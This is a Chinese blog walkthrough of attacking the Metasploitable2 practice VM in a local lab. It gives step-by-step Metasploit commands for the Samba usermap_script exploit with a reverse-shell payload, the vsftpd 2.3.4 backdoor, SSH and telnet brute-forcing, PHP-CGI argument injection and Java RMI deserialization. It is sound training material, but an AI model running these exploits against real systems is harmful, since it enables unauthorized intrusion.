metasploitable2靶场渗透


title: metasploitable2靶场渗透
date: 2023-2-13 9 :16 :35
tags: vulhub
categories: 渗透从入门到入土
author:Abyssaler


前言

Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 适用于学习网络安全新手学习

下载地址

链接:https://pan.baidu.com/s/1Q46VYaLlNCxA8O1SsEVWCg?pwd=gbs1
提取码:gbs1

实验环境

metasploitable2靶机ip:192.168.235.129

kali攻击机ip:192.168.235.130

渗透测试

信息收集

主机发现

首先arp-scan -l扫描一下内网

可以发现存活的主机

image-20230213093743041

端口扫描

使用nmap -sV 192.168.235.129扫描端口

nmap的具体用法可以参看站内文章:

https://abyssaler.github.io/post/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E6%B5%81%E7%A8%8B

image-20230213094115056

漏洞利用

收集到足够的信息后,就可以为其选择正确的exp和合适的payload了

samba漏洞利用

打开msf

msfconsole

输入msf>search samba命令搜索samba的漏洞利用模块,并选择合适的漏洞利用模块

image-20230213094513375

各个漏洞会按被利用成功的相对难易程度进行排序

因为exploit/multi/samba/usermap_script被标记为Excellent,为了提高渗透成功率,这里选择此模块进行接下来的渗透

查看漏洞的详细信息

info exploit/multi/samba/usermap_script

image-20230213094945094

使用use exploit/multi/samba/usermap_script即可利用该漏洞利用模块

image-20230213095126085

使用show payloads命令查看可利用的payload

image-20230213095214460

这里我们选择cmd/unix/reverse反向攻击载荷模块

image-20230213095336913

设置被攻击主机ip地址

set rhost 192.168.235.129

设置漏洞利用的端口号,这里我们选择445

set rport 445

设置发动攻击主机ip地址

set lhost 192.168.235.130

最后检查参数是否正确

show options

image-20230213095727737

设置完所有参数后,使用exploit或者run发动攻击

maf发动攻击成功后会获取目标主机的shell,为了验证该shell是目标主机的,可以查询主机名,用户名,ip地址等

image-20230213095946941

至此,samba漏洞就利用成功了

笑脸漏洞后门利用

笑脸漏洞相关介绍:

https://blog.csdn.net/weixin_52497013/article/details/121090861

看到有21端口,还可以试一下vsfpd漏洞

msf6 > search vsftd
[-] No results from search
msf6 > search vsftpd

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact

image-20230213100525574

set rhost 192.168.235.129

set lhost 192.168.235.130

show options

image-20230213100652015

run

image-20230213100726959

利用成功

22端口暴力破解

搜索

Search ssh_login

使用

Use auxiliary/scanner/ssh/ssh_login

设置目标地址

set rhost 192.168.235.129

设置用户字典路径

set USER_FILE /usr/share/wordlists/metasploit/mirai_user.txt

设置字典密码路径

set PASS_FILE /usr/share/wordlists/FastPwds.txt

设置线程是100

Set THREADS 100

开跑

run

23端口(telnet)暴力破解

search telnet

use auxiliary/scanner/telnet/telnet_login

set rhost 192.168.235.129

set user_file /root/Desktop/0.txt

set pass_file /root/Desktop/1.txt

run

image-20230213103549601

80端口漏洞利用

use exploit/multi/http/php_cgi_arg_injection

set rhost 192.168.235.129

run

image-20230213103859807

1099端口java反序列化命令执行漏洞

use exploit/multi/misc/java_rmi_server

sessions

set rhost 192.168.235.129

run

image-20230213104316932

后记

metasploitable2靶场作为一个对初学者非常友好的靶场,还有很多其他漏洞可以利用,在这里就不一一复现了,想了解该靶场的其他漏洞可以看看这几篇文章

https://www.freebuf.com/articles/web/286084.html

https://blog.csdn.net/Aluxian_/article/details/123355133

https://blog.csdn.net/m0_46371267/article/details/120740639

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值